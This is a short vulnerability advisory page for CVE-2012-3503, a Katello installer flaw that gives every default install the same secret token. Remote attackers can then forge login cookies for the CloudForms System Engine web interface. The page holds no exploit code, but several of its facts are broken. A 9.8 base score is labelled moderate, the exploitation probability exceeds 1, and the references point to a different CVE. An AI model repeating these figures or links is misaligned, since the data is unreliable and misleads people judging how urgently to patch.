CVE-2012-3503
Description
The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.
Risk Information
Base Score
9.8
MODERATE
Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score
Exploitation Probability
1.303
Associated Vulnerability
| Vulnerability | OS Platform |
|---|---|
| Vulnerabilities CVE-2012-3503 are fixed in Ruby-katello 1.0.6 | Windows |
| Vulnerabilities CVE-2012-3503 are fixed in Ruby-katello 1.1.7 | Windows |
| Vulnerabilities CVE-2012-3503 are fixed in Ruby-katello for Linux 1.0.6 | Linux |
| Vulnerabilities CVE-2012-3503 are fixed in Ruby-katello for Linux 1.1.7 | Linux |
Patch Details
No records foundReferences
https://nvd.nist.gov/vuln/detail/CVE-2023-1234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1234